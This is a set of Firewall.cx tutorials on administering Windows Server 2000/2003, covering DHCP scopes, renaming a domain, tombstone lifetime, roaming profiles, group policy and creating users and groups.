•  Address Pool – Shows the IP address range the scope offers along with any IP address exclusions.

•  Address Leases – Shows all the leased IP addresses.

•  Reservations – Shows the IP addresses that are reserved. Reservations are made by specifying the MAC address that the server would “listen to” when IP address requests are received by the server. Certain network devices, such as networked printers, are best configured with reserved IP addresses rather than static IP addresses.

•  Scope Options – Shows configured scope options. Some of the visible options now are router, DNS, domain name and WINS options.

•  Server Options – Shows configured server options. This is similar to scope options except that these options are either inherited by all the scopes or overridden by them (covered in 'Advanced DHCP Server Configuration on Windows 2003' article).

Earlier, we only defined exclusions for our servers, router plus a few more spare IP addresses. In case you need to exclude more IP addresses, you can do it at this point by following these instructions:

13. Select and right-click Address Pool and choose New Exclusion Range.

14. When the Add Exclusion window comes up, enter the required range and then click Add. In our example, we've excluded the addition range 192.168.0.230 - 192.168.0.232.

tk-windows-dhcp-2k3-basic-12

Notice that the server node and scope node still has a red arrow pointing down. These red arrows pointing down mean that the server and scope are not “turned on”.

The concept of “turning on” the scope is called “activating” and the concept of “turning on” the server for DHCP service is called “authorizing”. Security has some influence in the concept of authorizing a DHCP server and, to authorize a DHCP server, you must be a member of the Enterprise Admins Active Directory group.

15. Right-click the server (server001.firewall.cx) and choose Authorize , then right-click the scope (Building A, Floor 1) and choose Activate . If the red arrows remain, refresh the MMC by going to Action > Refresh .

tk-windows-dhcp-2k3-basic-13

Congratulations! At this point, you should have a working DHCP server capable of providing IP addresses!

  • Hits: 101785

Renaming Windows 2000 Domain Name

Sometimes renaming a domain is an essential business requirement. There are many situations, such as mergers, change of company name or migration from a test environment to a production environment, that require you to change the existing domain name.

However, changing a domain name in Windows Server 2000 is not a simple or straightforward process. It is a time consuming and complex procedure, which requires extensive work.

The renaming of a Windows 2000 domain may impact other server applications that are running in the domain, such as Exchange Server and other custom applications that are closely integrated with Active Directory and use hard coded NETBIOS names.

The major task in renaming a domain is to revert the Windows Server 2000 to Windows NT and then upgrade it to Windows Server 2000 with a new DNS (FQDN) name. If there is more than one domain controller in the domain then all the Windows 2000 domain controllers must be demoted to member servers before renaming the desired domain controller.

Requirements

Renaming the Windows 2000 domain is only possible if the default functional level of the domain is set to mixed mode. The Windows 2000 mixed mode function level means that there is at least one NT 4.0 BDC in the domain/Forest. The functional level of the domain must be in mixed mode because you need use NT 4.0 BDC to complete the renaming procedure.

Note: If the default functional level of the domain is set to native mode, you cannot revert to mixed mode and cannot rename the domain.

If you have one or more child domains then you have to downgrade all the child domains to Windows NT before downgrading the parent domain. You need to then upgrade the parent domain with new FQDN and then upgrade the child domain/s.

Steps To Be Taken

To rename a Windows 2000 domain, you need to follow these steps:

1. Verify that at least one Windows NT 4.0 BDC, having Service Pack 6 or 6a installed on it, exists in the domain.

2. Backup all the domain controllers in the domain.

3. If required, install another Windows NT 4.0 BDC in the domain and force replication to ensure that the backup of all the security information, domain user accounts and SAM database exists. You can use net accounts /sync command on the Windows NT 4.0 BDC to force replication.

4. If you have just one domain controller, simply isolate it from the network by removing all the cables.

If you have more than one domain controller, you need to demote all the Windows 2000 domain controllers to member servers, leaving just one Windows 2000 domain controller, by using dcpromo command.

Then isolate the last Windows 2000 domain controller after ensuring that a Windows NT 4.0 BDC is present on the network.

5. Demote the last Windows 2000 domain controller by using dcpromo command ensuring that the last domain controller option is selected as the domain option.

Note: To run dcpromo command on the last Windows 2000 domain controller, connect it to an isolated active hub because dcpromo command requires an active connection.

6. Promote Windows NT BDC to a PDC and then upgrade it to Windows 2000.

7. Provide the desired domain name at the time of Active Directory installation.

8. Promote all the demoted member servers back to Windows 2000 domain controllers by running dcpromo on them.

Article Summary

In this article we have seen the different scenarios and methods of renaming a Windows 2000 domain. We have learnt that renaming a Windows 2000 domain is a fairly complex process. We must keep in mind that changing domain name in Windows 2000 should not be performed unless it is absolutely necessary.

Careful planning while deciding on the FQDN/DNS name of the Windows 2000 domain at the time of installation can avoid the trouble of renaming a Windows 2000 domain.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 21779

Active Directory Tombstone Lifetime Modification

Tombstone is a container object that contains the deleted objects from Active Directory. Actually when an object is deleted from Active Directory, it is not physically removed from the Active Directory for some days. Rather, the Active Directory sets the ‘isDeleted' attribute of the deleted object to TRUE and move it to a special container called Tombstone, previously known as CN=Deleted Objects.

The tombstones cannot be accessed through Windows Directories or through Microsoft Management Console (MMC) snap-ins. However, tombstones are available to Directory Replication Process, so that the tombstones are replicated to all the domain controllers in the domain. This process ensures that the object deleted is deleted from all the computers throughout the Active Directory.

The tombstone lifetime attribute is the attribute that contains a time period after which the object is physically deleted from the Active Directory. The default value for the tombstone lifetime attribute is 60 days. However, you can change this value if required. Usually tombstone lifetime value is kept longer than the expected replication latency between the domain controllers so that the tombstone is not deleted before the objects are replicated across the forest.


The tombstone lifetime attribute remains same on all the domain controllers and it is deleted from all the servers at the same time. This is because the expiration of a tombstone lifetime is based on the time when an object was deleted logically from the Active Directory, rather than the time when it is received as a tombstone on a server through replication.

Changing Tombstone Lifetime Attribute

The tombstone lifetime attribute can be modified in three ways: Using ADSIEdit tool, using LDIF file, and through VBScript.

Using ADSIEdit Tool

The easiest method to modify tombstone lifetime in Active Directory is by using ADSIEdit. The ADSIEdit tool is not installed automatically when you install Windows Server 2003. You need to install it separately by installing support tools from Windows Server 2003 CD.
If you haven't got your CD's in hand, you can simply download the Windows 2003 SP1 Support Tools from Firewall.cx here.
To install ADSIEdit tool and to modify tombstone lifetime in Active Directory using this tool, you need to:

  1. Insert the Windows Server 2003 CD.
  2. Browse the CD to locate the Support\Tools directory.
  3. Double-click the suptools.msi to proceed with the installation of support tools.
  4. Select Run command from the Start menu.
  5. Type ADSIEdit.msc to open the ADSI Editor, as shown below:

tk-windows-tombstone-1

The ADSI Edit window appears:
tk-windows-tombstone-2

6. Expand Configuration node then subsequently expand CN=Configuration, DC Firewall, DC=cx node.
7. Expand CN-Services node.
8. Drill down to CN=Directory Service under CN Windows NT , as shown in the figure below:
tk-windows-tombstone-3

9. Right-click CN=Directory Service and select Properties from the menu that appears
The CN=Directory Service Properties window appears, as shown below:
10. Double-click the tombstoneLifetime attribute in the Attributes list.
tk-windows-tombstone-4

The Integer Attribute Editor window appears, as shown below:
tk-windows-tombstone-5

11. Set the number of days that tombstone objects should remain in Active Directory in the Value field.
12. Click OK .
The Tombstone Lifetime has now been successfully changed.

Other Ways Of Changing The Tombstone Lifetime Attribute

Using an LDIF file

To change the tombstone lifetime attribute using LDIF file, you need to create a LDIF file using notepad and then execute it using LDIFDE tool. To change the tombstone lifetime attribute using LDIF file, you need to:
1. Create a text file using notepad with the following content:

dn: cn=Directory Service,cn=Windows NT,cn=Services,cn=Configuration, , <ForestRootDN> changetype: modify
replace: tombstoneLifetime
tombstoneLifetime: <NumberOfDays>

2. Provide the appropriate values in the text between <>. For example put the name of your Active Directory Forest Root domain in the <ForestRootDN> and put the number of days you want to set for tombstone lifetime in <NumberOfDays>.

3. Don't forget to put "-" on the last line.

4. Save the file with .ldf extension.

5. Open the Command Prompt and type the following command on the command prompt:
c:\> Ldifde –v –I –f <Path to tombstoneLifetime.ldf> The Tombstone Lifetime is successfully changed.

Using a VBScript

To change tombstone lifetime using VBScript, you need to type the following code with appropriate values and execute the script.

intTombstoneLifetime = <NumberOfDays>  
set objRootDSE = GetObject("LDAP://RootDSE")
set objDSCont = GetObject("LDAP://cn=Directory Service,cn=Windows NT," & _ "cn=Services," & objRootDSE.Get("configurationNamingContext") )
objDSCont.Put "tombstoneLifetime", intTombstoneLifetime
objDSCont.SetInfo
WScript.Echo "The tombstone lifetime is set to " & _ intTombstoneLifetime

Article Summary

This article explained what the Active Directory Tombstone attribute is and how you can change it to control delete operations performed by the Active Directory replication process. We covered three different methods in great detail to give all the necessary information so these actions can be covered by any Windows Administrator.

  • Hits: 54243

Configuring Windows Server Roaming Profiles

Windows roaming profiles allow the mobile users of a company to always work with their personal settings from any network computer in a domain. Roaming profiles are a collection of personal user settings of a user, saved at a central location on a network.

These settings and configurations are recovered on any network computer as soon as users log in with their credentials.

The roaming user profiles functionality is very useful because it allows mobile users to log on to a variety of computers located at different places and get the same look and feel of their own personalized desktops. However, roaming user profiles in Windows Server 2003 does not allow you to use encrypted files.

A roaming profile is made up of folders that appear under the <username> folder under Documents and Setting, as shown below:

tk-windows-roaming-profiles-1

The detailed description of each folder is as follows:

  • Desktop: This folder contains all the files, folders, and shortcuts data that is responsible for the appearance of your desktop screen.
  • Favorites: This folder contains the shortcuts of the favorite and frequently visited websites of the user.
  • Local Settings: This folder contains temporary files, history, and the application data.
  • My Documents: This folder contains documents, music, pictures, and other items.
  • The Recent: This folder contains the most recently accessed files and folders by the user.
  • Start Menu: This folder contains the Start menu items.
  • Cookies: This folder contains all cookies stored on the user's computer.
  • NetHood: This folder contains shortcuts to sites in My Network Places .
  • PrintHood: This folder contains the shortcuts of printers configured for the user's computer.
  • Application Data: This folder contains the program-specific and the security settings of the applications that the user has used.
  • Templates: This folder contains the templates for applications such as Microsoft Word and Excel.
  • SendTo: This folder contains the popular Send To destination on right-clicking a menu.

Creating Roaming User Profiles

You can create roaming user profiles on Windows NT Server 4.0, Windows 2000 Server, or Windows Server 2003 based computers. In addition, you can use Windows NT Workstation 4.0, Windows XP Professional, or Windows 2000 Professional based computer that is running Windows NT Server Administration Tools to create roaming user profiles.

The three major steps involved in creating a roaming user profile include creating a temporary user profile on a local computer, copying that profile to a network server, and then defining the user's profile location through the group policy.

To create a roaming user profile, follow the steps given below:

1. Log on as Administrator, or as a user of local administrator group or Account Operators local group in the domain:

tk-windows-roaming-profiles-2

 

2. Open Administrative Tools in the Control Panel and then click Active Directory Users and Computers, as shown above.

3. Click Users folder under Local Users and Groups node, Right-click Users and then click New User in the menu that appears, as shown below:

Note: If you are using Active Directory then click Users folder under Active Directory Users and Computers node.

tk-windows-roaming-profiles-3

The New User dialog box appears as shown below.

 

4. Provide the User logon name and the Password for the user for whom the roaming profile is being created in their respective fields. Click on Next:

tk-windows-roaming-profiles-4

 

5. Enter the user password and clear the User must change password at next logon option as shown below:

tk-windows-roaming-profiles-4a

 

6. Click Create , click Close, and then quit the Computer Management snap-in.

7. Log off the computer and then Log on to your workstation using the user account that you have just created on your server.

8. Verify that a folder with the user name is created under the Documents and Settings folder, as shown below:

tk-windows-roaming-profiles-5

9. Configure your desktop by adding shortcuts and modifying its appearance.

8. Configure the Start menu by adding desired options to it.

10. Log off.

Copying The Profile To Your Server

A temporary profile with all the required settings is configured on your local computer. You need to now copy this local profile to a network server which can be accessed centrally by all the computers.

Try not to user a domain controller for this purpose because domain controllers have many other tasks to do, so it is better to keep them away from this task. You can however, choose a member server for this purpose. Make sure that the member server you choose is regularly backed up otherwise you may loose all your roaming profiles.

To copy the profile to a network server, you need to:

1. Log on as Administrator and then create a Profile folder on a network server.

Windows uses Profile folder by default to store roaming user profiles. Although you can give a different name to this folder but this folder is traditionally named as Profile folder.

2. Share the Profile folder and give everyone the full control at share level.

3. Open Control Panel , and then click System icon. The System Properties dialog box appears.

4. Click Advanced tab, and then click Settings under User Profiles section, as shown below:

tk-windows-roaming-profiles-6

 The User Profiles dialog box appears.

 

5. Click the temporary user profile that you had created and then click Copy To, as shown in the Figure below:

tk-windows-roaming-profiles-7

 

Next, The Copy To dialog box appears, a shown below.

6. Type the network path of the Profile folder in the Copy Profile To field.

A folder with the temporary user name will be created automatically under the Profiles folder.

7. Click Change.

tk-windows-roaming-profiles-8

 

8. The Select User or Group dialog box appears.

9. Enter the name of the temporary user that you have created.

10. Click OK four times on all the windows that you have opened recently.

11. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in the second screenshot in this article.

12. Click Users folder under Local Users and Groups node, as shown below:

13. Double-click the temporary user account that you had created.

14. The Properties window for the user account appears as shown in the figure below.

15. Click the Profile tab and then type the path of Profile folder that you had created on a network server in the Profile path field:

tk-windows-roaming-profiles-9

 

16. Click OK and then quit the Computer Management snap-in.

This completes the process of creating a roaming user profile. Now when the user logs into any computer in the domain using his/her credentials, a copy of the user profile stored on the network will be copied to that computer with all the latest changes that the user might have made.

Usually when there are a few roaming profiles enabled in a domain then the login and log off become extremely slow. This happens mostly when roaming users save large files on their computers. Each time a logs off or logs on to a different computer the large files take long time to save on the network and recover from the network.

The solution to this problem is to use Folder Redirection along with roaming user profiles. The Folder redirection feature allows you to redirect folders such as Application Data, Desktop, My Documents, and Start Menu to a different network location. These folders are typically used to save the large files. When Folder Redirection is used then Windows understand that those particular folders need not be touched each time a roaming user logs in/off. These folders will only be touched by Windows when a user actually tries to open a file from them.

Another solution to control the growing size user profiles is to create Mandatory User Profiles for the users. However, you can use such profiles when you want to provide identical desktop configurations to all the roaming users. When mandatory user profiles are configured for the users, the users are not allowed to change their profile settings and thus the profiles size always remain manageable. To make a roaming user profile mandatory, you need to rename the Ntuser.dat file as Ntuser.man in the user's profile folder.

Article Summary

Roaming user profiles are simply collections of settings and configurations that are stored on a network location for each user. Once you perform some fairly simple configurations, every time a user logs on to a machine in your domain with his domain credentials, that user's settings will follow him and automatically be applied to his log-on session for that particular machine.

This article covered the creation of roaming user profiles in a Windows server active directory.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 47744

Configuring Domain Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to manage a group of people accessing a resource efficiently. The group policies can be used to control both the users and computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

The group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, the Local Group Policies allow the local administrator to manage all the users of a computer to access the resources and features available on the computer. For example an administrator can remove the use of Run command from the start menu. This will ensure that the users will not find Run command on that computer.

The Domain-based Group Policies on the other hand allow the domain/enterprise administrators to manage all the users and the computers of a domain/ forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains, and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003. A default group policy already exists. You only need to modify it by setting values of different policy settings according to your specific requirements. You can also create new group policies to meet your specific business requirements. The group policies allow you to implement:

  • Registry based settings: Allows you to create a policy to administer operating system components and applications.
  • Security settings: Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria, or URL zone.
  • Software restrictions: Allows you to create a policy that would restrict users to run unwanted applications and protect computers against virus and hacking attack.
  • Software distribution and installation: Allows you to either assign or publish software application to domain users centrally with the help of a group policy.
  • Automation of tasks using computer and User Scripts
  • Roaming user profiles: Allow mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.
  • Internet Explorer maintenance: Allow administrators to manage the IE settings of the user's computers in a domain by setting the security zones, privacy settings, and other parameters centrally with the help of group policy.

Configuring a Domain-Based Group Policy

Just as you used group policy editor to create a local computer policy, to create a domain-based group policy you need to use Active Users and Computers snap-in from where you can open the GPMC.

Follow the steps below to create a domain-based group policy

1. Select Active Directory Users and Computers tool from the Administrative Tools.

2. Expand Active Directory Users and Computers node, as shown below.

3. Right-click the domain name and select Properties from the menu that appears:

tk-windows-gp-domain-1

The properties window of the domain appears.

4. Click the Group Policy tab.

5. The Group Policy tab appears with a Default Domain Policy already created in it, as shown in here:

tk-windows-gp-domain-2

 

You can edit the Default Domain Policy or create a new policy. However, it is not recommended to modify the Default Domain Policy for regular settings.

We will select to create a new policy instead. Click New to create a new group policy or group policy object. A new group policy object appears below the Default Domain Policy in the Group Policy tab, as shown below:

tk-windows-gp-domain-3

 

Once you rename this group policy, you can either double-click on it, or select it and click Edit.

You'll next be presented with the Group Policy Object Editor from where you can select the changes you wish to apply to the specific Group Policy:

tk-windows-gp-domain-4

 

In this example, we have selected to Remove Run menu from Start Menu as shown above. Double-click on the selected setting and the properties of the settings will appear. Select Enabled to enable this setting. Clicking on Explain will provide plenty of additional information to help you understand the effects of this setting.

tk-windows-gp-domain-5

When done, click on OK to save the new setting.

Similarly you can set other settings for the policy. After setting all the desired options, close the Group Policy Object editor . You new group policy will take effect.

Article Summary

Domain Group Policies give the administrator great control over its domain users by enhancing security levels and restricting access to specific areas of the operating system. These policies can be applied to every organisation unit, group or user in the active directory or selectively to the areas you need. This article shows you how to create a domain group policy that can then be applied as required.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

Windows 2003 Group Policies allow the administrators to manage a group of people accessing a resource efficiently. The group policies can be used to control both the users and computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

The group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, the Local Group Policies allow the local administrator to manage all the users of a computer to access the resources and features available on the computer. For example an administrator can remove the use of Run command from the start menu. This will ensure that the users will not find Run command on that computer.

The Domain-based Group Policies on the other hand allow the domain/enterprise administrators to manage all the users and the computers of a domain/ forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains, and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003/ Windows XP. A default group policy already exists. You only need to modify it by setting values of different policy settings according to your specific requirements. You can also create new group policies to meet your specific business requirements. The group policies allow you to implement:

Registry based settings : Allows you to create a policy to administer operating system components and applications.

Security settings : Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria, or URL zone.

Software restrictions : Allows you to create a policy that would restrict users to run unwanted applications and protect computers against virus and hacking attack.

Software distribution and installation : Allows you to either assign or publish software application to domain users centrally with the help of a group policy.

Automation of tasks using computer and User Scripts

Roaming user profiles : Allow mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.

Internet Explorer maintenance : Allow administrators to manage the IE settings of the user's computers in a domain by setting the security zones, privacy settings, and other parameters centrally with the help of group policy.





Configuring a Domain-Based Group Policy

Just as you used group policy editor to create a local computer policy, to create a domain-based group policy you need to use Active Users and Computers snap-in from where you can open the GPMC .



Follow the steps below to create a domain-based group policy

1. Select Active Directory Users and Computers tool from the Administrative Tools.
2. Expand Active Directory Users and Computers node, as shown below.
3. Right-click the domain name and select Properties from the menu that appears.





The properties window of the domain appears.

4. Click the Group Policy tab.
5. The Group Policy tab appears with a Default Domain Policy already created in it, as shown in here:



You can edit the Default Domain Policy or create a new policy. However, it is not recommended to modify the Default Domain Policy for regular settings.

We will select to create a new policy instead. Click New to create a new group policy or group policy object. A new group policy object appears below the Default Domain Policy in the Group Policy tab, as shown below:



Once you rename this group policy, you can either double-click on it, or select it and click Edit.

You'll next be presented with the Group Policy Object Editor from where you can select the changes you wish to apply to the specific Group Policy:



In this example, we have selected to Remove Run menu from Start Menu as shown above. Double-click on the selected setting and the properties of the settings will appear. Select Enabled to enable this setting. Clicking on Explain will provide plenty of additional information to help you understand the effects of this setting.





When done, click on OK to save the new setting.

Similarly you can set other settings for the policy. After setting all the desired options, close the Group Policy Object editor . You new group policy will take effect.



Article Summary

Domain Group Policies give the administrator great control over its domain users by enhancing security levels and restricting access to specific areas of the operating system. These policies can be applied to every organisation unit, group or user in the active directory or selectively to the areas you need. This article shows you how to create a domain group policy that can then be applied as required.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.



About the writers

GFI Software provides the single best source of network security, content security and messaging software for small to medium sized businesses.

Alan Drury is member of the Firewall.cx team and senior engineer at a large multinational company, supporting complex large Windows networks.

Chris Partsenidis is a CCNA certified Engineer, MCP, LCP, Founder & Senior Editor of Firewall.cx

  • Hits: 117385

Configuring Local Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to efficiently manage a group of people accessing a resource. Group policies can be used to control both the users and the computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

Group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, Local Group Policies allow the local administrator to manage all the users of a computer to access the resources and features available on the computer. For example an administrator can remove the use of the Run command from the start menu. This will ensure that the users will not find Run command on that computer.

Domain-based Group Policies allow the domain / enterprise administrators to manage all the users and the computers of a domain / forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003 / Windows XP. A default group policy already exists. You only need to modify the values of different policy settings according to your specific requirements. You can create new group policies to meet your specific business requirements. Group policies allow you to implement:

Registry based settings: Allows you to create a policy to administer operating system components and applications.

Security settings: Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria or URL zone.

Software restrictions: Allows you to create a policy that would restrict users running unwanted applications and protect computers against virus and hacking attacks.

Software distribution and installation: Allows you to either assign or publish software application to domain users centrally with the help of a group policy.

Roaming user profiles: Allows mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.

Internet Explorer maintenance: Allows administrators to manage the IE settings of the users' computers in a domain by setting the security zones, privacy settings and other parameters centrally with the help of group policy.

Using Local Group Policy

Local Group Policies affect only the users who log in to the local machine but domain-based policies affect all the users of the domain. If you are creating domain-based policies then you can create policy at three levels: sites, domains and OUs. Besides, you have to make sure that each computer must belong to only one domain and only one site.

A Group Policy Object (GPO) is stored on a per domain basis. However, it can be associated with multiple domains, sites and OUs and a single domain, site or OU can have multiple GPOs. Besides this, any domain, site or OU can be associated with any GPO across domains.

When a GPO is defined it is inherited by all the objects under it and is applied in a cumulative fashion successively starting from local computer to site, domain and each nested OU. For example if a GPO is created at domain level then it will affect all the domain members and all the OUs beneath it.

After applying all the policies in hierarchy, the end result of the policy that takes effect on a user or a computer is called the Resultant Set of Policy (RSoP).

To use GPOs with greater precision, you can apply Windows Management Instrumentation (WMI) filters and Discretionary Access Control List (DACL) permissions. The WMI filters allow you to apply GPOs only to specific computers that meet a specific condition. For example, you can apply a GPO to all the computers that have more than 500 MB of free disk space. The DACL permissions allow you to apply GPOs based on the user's membership in security groups.

Windows Server 2003 provides a GPMC (Group Policy Management Console) that allows you to manage group policy implementations centrally. It provides a unified view of local computer, sites, domains and OUs (organizational units). You can have the following tools in a single console:

  • Active Directory Users and Computers
  • Active Directory Sites and Services
  • Resultant Set of Policy MMC snap-in
  • ACL Editor
  • Delegation Wizard

The screenshot below shows four tools in a single console.

tk-windows-gp-local-1

 

A group policy can be configured for computers or users or both, as shown here:

tk-windows-gp-local-2

The Group Policy editor can be run using the gpedit.msc command.

Both the policies are applied at the periodic refresh of Group Policies and can be used to specify the desktop settings, operating system behavior, user logon and logoff scripts, application settings, security settings, assigned and published applications options and folder redirection options.

Computer-related policies are applied when the computer is rebooted and User-related policies are applied when users log on to the computer.

Configuring a Local Group Policy

To configure a local group policy, you need to access the group policy editor. You can use Group Policy Editor by logging in as a local administrator from any member server of a domain or a workgroup server but not from a domain controller.

Sometimes this tool, or other Active directory tools that you need to manage group policy, does not appear in Administrative Tools. In that case you need to follow steps 1-10 given below to add Group Policy Editor tool in the console.

1. Click Start->Run and type mmc. The Console window appears, as shown below:

2. Select Add/remove Snap-in from the File menu. 

tk-windows-gp-local-3

 

The Add/Remove Snap-in window appears, as shown below:

3. Click Add.

4. The Add Standalone Snap-in window appears.

5. Select Group Policy Object Editor snap-in from the list.

6. Click Add and then click OK in Add/remove Snap-in window.

tk-windows-gp-local-4

 

The Select Group Policy Object window appears, as shown below:

7. Keep the default value “Local Computer

8. Click Finish.

tk-windows-gp-local-5

 

The Local Computer Policy MMC appears, as shown below.

You can now set the Computer Configuration or User Configuration policies as desired. This example takes User Configuration setting.

9. Expand User Configuration node:

tk-windows-gp-local-6

 

10. Expand Administrative Templates and then select the Start Menu and Taskbar node, as shown in Figure 7.

11. Double-click the settings for the policy that you want to modify from the right panel. In this example double-click Remove Run Menu from Start Menu.

tk-windows-gp-local-7

 

The properties window of the setting appears as shown in the below screenshot:

12. Click Enabled to enable this setting.

tk-windows-gp-local-8

Once you click on 'OK', the local policy that you have applied will take effect and all the users who would log on to this computer will not be able to see the Run menu item of the Start menu.

This completes our Local Group Policy configuration section. Next section covers Domain Group Policies, that will help you configure and control user access throughout the Active Directory Domain.

Article Summary

Group Policies are an Administrator's best friend. Group Policies can control every aspect of a user's desktop, providing enhanced security measures and restricting access to specified resouces. Group policies can be applied to a local server, as shown on this article, or to a whole domain.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

 

  • Hits: 73950

Creating Windows Users and Groups with Windows 2003

In a Windows server environment, it is very important that only authenticated users are allowed to log in for security reasons. To fulfill this requirement the creation of User accounts and Groups is essential.

User Accounts

In Windows Server 2003 computers there are two types of user accounts. These types are local and domain user accounts. The local user accounts are the single user accounts that are locally created on a Windows Server 2003 computer to allow a user to log on to a local computer. The local user accounts are stored in Security Accounts Manager (SAM) database locally on the hard disk. The local user accounts allow you to access local resources on a computer

On the other hand the domain user accounts are created on domain controllers and are saved in Active Directory. These accounts allow to you access resources anywhere on the network. On a Windows Server 2003 computer, which is a member of a domain, you need a local user account to log in locally on the computer and a domain user account to log in to the domain. Although you can have a same login and password for both the accounts, they are still entirely different account types.

You become a local administrator on your computer automatically because local computer account is created when a server is created. A domain administrator can be local administrator on all the member computers of the domain because by default the domain administrators are added to the local administrators group of the computers that belong to the domain.

This article discusses about creating local as well as domain user accounts, creating groups and then adding members to groups.

Creating a Local User Account

To create a local user account, you need to:

1. Log on as Administrator, or as a user of local administrator group or Account Operators local group in the domain.

2. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in Figure 1.

tk-windows-user-groups-1

Figure 1

 

3. Click Users folder under Local Users and Groups node, as shown in Figure 2.

tk-windows-user-groups-2

Figure 2

4. Right-click Users and then click New User in the menu that appears, as shown in Figure 3:

tk-windows-user-groups-3

Figure 3

The New User dialog box appears as shown below in Figure 4.

5. Provide the User name and the Password for the user in their respective fields.

6. Select the desired password settings requirement.

Select User must change password at next logon option if you want the user to change the password when the user first logs into computer. Select User cannot change password option if you do not want the user to change the password. Select Password never expires option if you do not want the password to become obsolete after a number of days. Select Account is disabled to disable this user account.

7. Click Create , and then click Close:

tk-windows-user-groups-4

 Figure 4

The user account will appear on clicking Users node under Local Users and Groups on the right panel of the window.

You can now associate the user to a group. To associate the user to a group, you need to:

8. Click Users folder under Local Users and Groups node.

9. Right-click the user and then select Properties from the menu that appears, as shown in Figure 5:

tk-windows-user-groups-5

 Figure 5

The Properties dialog box of the user account appears, as shown in Figure 6:

10. Click Member of tab.

The group(s) with which the user is currently associated appears.

11. Click Add.

tk-windows-user-groups-6

 Figure 6

The Select Groups dialog box appears, as shown in Figure 7.

12. Select the name of the group/object that you want the user to associate with from the Enter the object names to select field.

If the group/object names do not appear, you can click Advanced button to find them. Also if you want to choose different locations from the network or choose check the users available, then click Locations or Check Names buttons.

13. Click OK .

tk-windows-user-groups-7

Figure 7

The selected group will be associated with the user and will appear in the Properties window of the user, as shown in Figure 8:

tk-windows-user-groups-8

Figure 8

Creating a Domain User Account

The process of creating a domain user account is more or less similar to the process of creating a local user account. The only difference is a few different options in the same type of screens and a few steps more in between.

For example you need Active Directory Users and Computers MMC (Microsoft Management Console) to create domain account users instead of Local Users and Computers MMC. Also when you create a user in domain then a domain is associated with the user by default. However, you can change the domain if you want.

Besides all this, although, a domain user account can be created in the Users container, it is always better to create it in the desired Organization Unit (OU).

To create a domain user account follow the steps given below:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Expand the OU in which you want to create a user, right-click the OU and select New->User from the menu that appears.

tk-windows-user-groups-9

 Figure 9

3. Alternatively, you can click on Action menu and select New->User from the menu that appears.

The New Object –User dialog box appears, as shown in Figure 10.

4. Provide the First name, Last name, and Full name in their respective fields.

5. Provide a unique logon name in User logon name field and then select a domain from the dropdown next to User logon name field if you want to change the domain name.

The domain and the user name that you have provided will appear in the User logon name (pre-Windows 2000) fields to ensure that user is allowed to log on to domain computers that are using earlier versions of Windows such as Windows NT.

tk-windows-user-groups-10

Figure 10

6. Click Next.

The second screen of New Object –User dialog box appears similar to Figure 4.

7. Provide the User name and the Password in their respective fields.

8. Select the desired password settings requirement:

Select User must change password at next logon option if you want the user to change the password when the user first logs into computer. Select User cannot change password option if you do not want the user to change the password. Select Password never expires option if you do not want the password to become obsolete after a number of days. Select Account is disabled to disable this user account.

9. Click Next.

10. Verify the user details that you had provided and click Finish on the third screen of New Object –User dialog box.

11. Follow the steps 9-13 mentioned in Creating a Local User Account section to associate a user to a group.

Creating Groups

Just like user accounts, the groups on a Windows Server 2003 are also of two types, the built in local groups and built in domain groups. The example of certain built in domain groups are: Account Operators, Administrators, Backup Operators, Network Configuration Operators, Performance Monitor Users, and Users. Similarly certain built in local groups are: Administrators, Users, Guests, and Backup operators.

The built-in groups are created automatically when the operating system is installed and become a part of a domain. However, sometimes you need to create your own groups to meet your business requirements. The custom groups allow you limit the access of resources on a network to users as per your business requirements. To create custom groups in domain, you need to:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Right-click the OU and select New->Group from the menu that appears.

The New Object –Group dialog box appears, as shown in Figure 10.

3. Provide the name of the group in the Group name field.

The group name that you have provided will appear in the Group name (pre-Windows 2000) field to ensure that group is functional on domain computers that are using earlier versions of Windows such as Windows NT.

4. Select the desired group scope of the group from the Group scope options.

If the Domain Local Scope is selected the members can come from any domain but the members can access resources only from the local domain.

If Global scope is selected then members can come only from local domain but can access resources in any domain.

If Universal scope is selected then members can come from any domain and members can access resources from any domain.

5. Select the group type from the Group Type options.

The group type can be Security or Distribution . The Security groups are only used to assign and gain permissions to access resources and Distribution groups are used for no-security related tasks such as sending emails to all the group members.

tk-windows-user-groups-11

Figure 11

6. Click OK.

